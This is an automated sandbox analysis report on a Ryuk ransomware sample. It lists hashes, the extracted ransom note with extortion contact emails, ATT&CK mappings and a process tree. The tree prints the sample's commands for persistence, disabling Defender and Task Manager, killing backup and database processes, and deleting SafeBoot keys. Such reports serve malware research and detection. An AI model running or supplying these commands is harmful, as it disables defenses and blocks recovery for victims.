Analysis

  • max time kernel
    151s
  • max time network
    112s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230221-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-03-2023 01:49

General

  • Target

    788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe

  • Size

    767KB

  • MD5

    d2e194259106bca3b42dc8690d340b59

  • SHA1

    edcd63a3125854ed72cb5811f08644a87e265e3b

  • SHA256

    788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc

  • SHA512

    4cecf1db68cd71b92b2e968719a365397b3ccd16340a952a8901647e9829b0a6e8d4cb1f948fb792f2cc58e4f6e289fd81cb104b43ddc8469c0671935e653a13

  • SSDEEP

    12288:RnBkozA9lzIeVJ+OeO+OeNhBBhhBBUA9CGkIDIP6J9kgnDC3TbqUttRrvCsZ+nt2:jkozAjK95DIP4DCDbq8tRrvB

Malware Config

Extracted

Path

C:\ProgramData\RyukReadMe.txt

Ransom Note
Your network has been penetrated. All files on each host in the network have been encrypted with a strong algorithm. Backups were either encrypted Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover. We exclusively have decryption software for your situation. More than a year ago, world experts recognized the impossibility of deciphering by any means except the original decoder. No decryption software is available in the public. Antiviruse companies, researchers, IT specialists, and no other persons cant help you decrypt the data. DO NOT RESET OR SHUTDOWN - files may be damaged. DO NOT DELETE readme files. To confirm our honest intentions.Send 2 different random files and you will get it decrypted. It can be from different computers on your network to be sure that one key decrypts everything. 2 files we unlock for free To get info (decrypt your files) contact us at Vulcanteam@CYBERFEAR.COM or vulcanteam@inboxhub.net You will receive btc address for payment in the reply letter Ryuk No system is safe
Emails

Vulcanteam@CYBERFEAR.COM

vulcanteam@inboxhub.net

Signatures

  • Ryuk

    Ransomware distributed via existing botnets, often Trickbot or Emotet.

  • Disables Task Manager via registry modification
  • Drops startup file 3 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
    "C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe"
    1⤵
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2124
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2360
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
        3⤵
        • Creates scheduled task(s)
        PID:2904
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
      2⤵
      • Drops startup file
      PID:1484
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
      2⤵
        PID:3396
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:716
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
          3⤵
          • Creates scheduled task(s)
          PID:4428
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:116
        • C:\Windows\SysWOW64\attrib.exe
          attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
          3⤵
          • Drops startup file
          • Views/modifies file attributes
          PID:4504
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe" /RU SYSTEM /RL HIGHEST /F
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1548
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe" /RU SYSTEM /RL HIGHEST /F
          3⤵
          • Creates scheduled task(s)
          PID:4312
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe" /F
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:792
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe" /F
          3⤵
          • Creates scheduled task(s)
          PID:4000
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3412
        • C:\Windows\SysWOW64\attrib.exe
          attrib +h +s ryuk.exe
          3⤵
          • Views/modifies file attributes
          PID:4580
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:5004
        • C:\Windows\SysWOW64\attrib.exe
          attrib +h +s C:\ProgramData\ryuk.exe
          3⤵
          • Views/modifies file attributes
          PID:4788
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4036
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
          3⤵
            PID:5072
            • C:\Windows\SysWOW64\icacls.exe
              icacls * /grant Everyone:(OI)(CI)F /T /C /Q
              4⤵
              • Modifies file permissions
              PID:3476
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4616
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /c taskkill /t /f /im sql*
            3⤵
              PID:4308
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /t /f /im sql*
                4⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1428
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /t /im veeam*
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1792
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
            2⤵
              PID:3332
              • C:\Windows\SysWOW64\reg.exe
                reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
                3⤵
                  PID:1636
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1
                2⤵
                  PID:988
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2
                  2⤵
                    PID:1640
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID
                    2⤵
                      PID:1944
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1
                      2⤵
                        PID:1128
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "
                        2⤵
                          PID:5100
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                          2⤵
                            PID:708
                            • C:\Windows\SysWOW64\reg.exe
                              reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                              3⤵
                                PID:2932
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                              2⤵
                                PID:4604
                                • C:\Windows\SysWOW64\reg.exe
                                  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                  3⤵
                                    PID:3472
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
                                  2⤵
                                    PID:1536
                                    • C:\Windows\SysWOW64\reg.exe
                                      reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
                                      3⤵
                                        PID:1764
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
                                      2⤵
                                        PID:3876
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
                                          3⤵
                                            PID:444

                                      Network

                                      MITRE ATT&CK Matrix ATT&CK v6

                                      Execution

                                      Scheduled Task

                                      1
                                      T1053

                                      Persistence

                                      Scheduled Task

                                      1
                                      T1053

                                      Hidden Files and Directories

                                      1
                                      T1158

                                      Privilege Escalation

                                      Scheduled Task

                                      1
                                      T1053

                                      Defense Evasion

                                      File Permissions Modification

                                      1
                                      T1222

                                      Hidden Files and Directories

                                      1
                                      T1158

                                      Discovery

                                      Query Registry

                                      1
                                      T1012

                                      Peripheral Device Discovery

                                      1
                                      T1120

                                      System Information Discovery

                                      2
                                      T1082

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\RyukReadMe.html
                                        Filesize

                                        152B

                                        MD5

                                        a641bf8ac8307aad57ecab53872e67db

                                        SHA1

                                        6fa8d69a859c34b8e75223ed8f426dbdf3d03df7

                                        SHA256

                                        9383b707c654726704f6968a151b67fa564653e91c8f3a31298b8cb81469d2ce

                                        SHA512

                                        7d32498611e54397ee320ab09380356c3470daf8e45e0a41d550df129027ca7279f14ec2b9f1b33d312ddca7b7f446f1c5689cae83502f4144f5807e39dcf5f4

                                      • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\RyukReadMe.txt
                                        Filesize

                                        1KB

                                        MD5

                                        f69127370e1f1aede86e881dd446f6aa

                                        SHA1

                                        65298f80e3b97f59ea45179463ab9c5cc3ee9337

                                        SHA256

                                        da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc

                                        SHA512

                                        5e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4

                                      • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ryuk.exe
                                        Filesize

                                        767KB

                                        MD5

                                        d2e194259106bca3b42dc8690d340b59

                                        SHA1

                                        edcd63a3125854ed72cb5811f08644a87e265e3b

                                        SHA256

                                        788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc

                                        SHA512

                                        4cecf1db68cd71b92b2e968719a365397b3ccd16340a952a8901647e9829b0a6e8d4cb1f948fb792f2cc58e4f6e289fd81cb104b43ddc8469c0671935e653a13

                                      • C:\ProgramData\RYUKID
                                        Filesize

                                        8B

                                        MD5

                                        728c12c960ea2380a041740b51a6cc50

                                        SHA1

                                        205d24f54069a0ec5fb3138cf3d0779b1fbb9a00

                                        SHA256

                                        3f7c89c695c99bc7e44a788158e38f88e1627e8e51f235d2f0417321d72601e2

                                        SHA512

                                        0aba8966b4adcf8542f36338d4cb6f92f4dec10f83183560b03c18dee2ec26f9a8fe90a4b6db9c5a477b960445439e8da11028d9af94e0798732a51b3edb899b

                                      • C:\ProgramData\RyukReadMe.txt
                                        Filesize

                                        1KB

                                        MD5

                                        f69127370e1f1aede86e881dd446f6aa

                                        SHA1

                                        65298f80e3b97f59ea45179463ab9c5cc3ee9337

                                        SHA256

                                        da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc

                                        SHA512

                                        5e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4

                                      • C:\ProgramData\hrmlog1
                                        Filesize

                                        2KB

                                        MD5

                                        4e473b117f0782626d179384f10f6bed

                                        SHA1

                                        121d543dbd3b3255150be29bdff40d61ac69506f

                                        SHA256

                                        bcf51c0a7753a91156dfe4f5de73896f382d88ac70fa0e87751218275c0064a5

                                        SHA512

                                        555b73a31408b2f3926e1c5677592365318f127bae97413342c3c21521d314039b8932554a07197b8944a1409e4e540b5e73bfc6b1347f4ccf92b46ce0113c1c

                                      • C:\ProgramData\hrmlog1
                                        Filesize

                                        2KB

                                        MD5

                                        4e473b117f0782626d179384f10f6bed

                                        SHA1

                                        121d543dbd3b3255150be29bdff40d61ac69506f

                                        SHA256

                                        bcf51c0a7753a91156dfe4f5de73896f382d88ac70fa0e87751218275c0064a5

                                        SHA512

                                        555b73a31408b2f3926e1c5677592365318f127bae97413342c3c21521d314039b8932554a07197b8944a1409e4e540b5e73bfc6b1347f4ccf92b46ce0113c1c

                                      • C:\ProgramData\hrmlog1
                                        Filesize

                                        2KB

                                        MD5

                                        4e473b117f0782626d179384f10f6bed

                                        SHA1

                                        121d543dbd3b3255150be29bdff40d61ac69506f

                                        SHA256

                                        bcf51c0a7753a91156dfe4f5de73896f382d88ac70fa0e87751218275c0064a5

                                        SHA512

                                        555b73a31408b2f3926e1c5677592365318f127bae97413342c3c21521d314039b8932554a07197b8944a1409e4e540b5e73bfc6b1347f4ccf92b46ce0113c1c

                                      • C:\ProgramData\hrmlog2
                                        Filesize

                                        292B

                                        MD5

                                        72871fdc9229fa4256d991720d2f3d0f

                                        SHA1

                                        ac1d6cd7c5498a9ef4bc4a8b0455a31177bc05ef

                                        SHA256

                                        2c27af8b03f17df5d236e8de2b4710307fb90be2de024cb809a37cc6a2e32ad0

                                        SHA512

                                        f413ebb9df24f98f3d05ac678042f0a9d37d106e2e26c11d11a388c2d2d9891b4820f0e8ed18351903ef96dfd7880c054dce645488cb242650afa3312f0bc234

                                      • C:\ProgramData\hrmlog2
                                        Filesize

                                        292B

                                        MD5

                                        72871fdc9229fa4256d991720d2f3d0f

                                        SHA1

                                        ac1d6cd7c5498a9ef4bc4a8b0455a31177bc05ef

                                        SHA256

                                        2c27af8b03f17df5d236e8de2b4710307fb90be2de024cb809a37cc6a2e32ad0

                                        SHA512

                                        f413ebb9df24f98f3d05ac678042f0a9d37d106e2e26c11d11a388c2d2d9891b4820f0e8ed18351903ef96dfd7880c054dce645488cb242650afa3312f0bc234

                                      • C:\ProgramData\hrmlog2
                                        Filesize

                                        292B

                                        MD5

                                        72871fdc9229fa4256d991720d2f3d0f

                                        SHA1

                                        ac1d6cd7c5498a9ef4bc4a8b0455a31177bc05ef

                                        SHA256

                                        2c27af8b03f17df5d236e8de2b4710307fb90be2de024cb809a37cc6a2e32ad0

                                        SHA512

                                        f413ebb9df24f98f3d05ac678042f0a9d37d106e2e26c11d11a388c2d2d9891b4820f0e8ed18351903ef96dfd7880c054dce645488cb242650afa3312f0bc234

                                      • C:\ProgramData\ryuk.exe
                                        Filesize

                                        767KB

                                        MD5

                                        d2e194259106bca3b42dc8690d340b59

                                        SHA1

                                        edcd63a3125854ed72cb5811f08644a87e265e3b

                                        SHA256

                                        788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc

                                        SHA512

                                        4cecf1db68cd71b92b2e968719a365397b3ccd16340a952a8901647e9829b0a6e8d4cb1f948fb792f2cc58e4f6e289fd81cb104b43ddc8469c0671935e653a13

                                      • C:\Users\Admin\AppData\Local\Temp\RYUKID
                                        Filesize

                                        8B

                                        MD5

                                        728c12c960ea2380a041740b51a6cc50

                                        SHA1

                                        205d24f54069a0ec5fb3138cf3d0779b1fbb9a00

                                        SHA256

                                        3f7c89c695c99bc7e44a788158e38f88e1627e8e51f235d2f0417321d72601e2

                                        SHA512

                                        0aba8966b4adcf8542f36338d4cb6f92f4dec10f83183560b03c18dee2ec26f9a8fe90a4b6db9c5a477b960445439e8da11028d9af94e0798732a51b3edb899b

                                      • C:\Users\Admin\AppData\Local\Temp\hrmlog1
                                        Filesize

                                        2KB

                                        MD5

                                        4e473b117f0782626d179384f10f6bed

                                        SHA1

                                        121d543dbd3b3255150be29bdff40d61ac69506f

                                        SHA256

                                        bcf51c0a7753a91156dfe4f5de73896f382d88ac70fa0e87751218275c0064a5

                                        SHA512

                                        555b73a31408b2f3926e1c5677592365318f127bae97413342c3c21521d314039b8932554a07197b8944a1409e4e540b5e73bfc6b1347f4ccf92b46ce0113c1c

                                      • C:\Users\Admin\AppData\Local\Temp\hrmlog2
                                        Filesize

                                        292B

                                        MD5

                                        72871fdc9229fa4256d991720d2f3d0f

                                        SHA1

                                        ac1d6cd7c5498a9ef4bc4a8b0455a31177bc05ef

                                        SHA256

                                        2c27af8b03f17df5d236e8de2b4710307fb90be2de024cb809a37cc6a2e32ad0

                                        SHA512

                                        f413ebb9df24f98f3d05ac678042f0a9d37d106e2e26c11d11a388c2d2d9891b4820f0e8ed18351903ef96dfd7880c054dce645488cb242650afa3312f0bc234

                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe
                                        Filesize

                                        767KB

                                        MD5

                                        d2e194259106bca3b42dc8690d340b59

                                        SHA1

                                        edcd63a3125854ed72cb5811f08644a87e265e3b

                                        SHA256

                                        788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc

                                        SHA512

                                        4cecf1db68cd71b92b2e968719a365397b3ccd16340a952a8901647e9829b0a6e8d4cb1f948fb792f2cc58e4f6e289fd81cb104b43ddc8469c0671935e653a13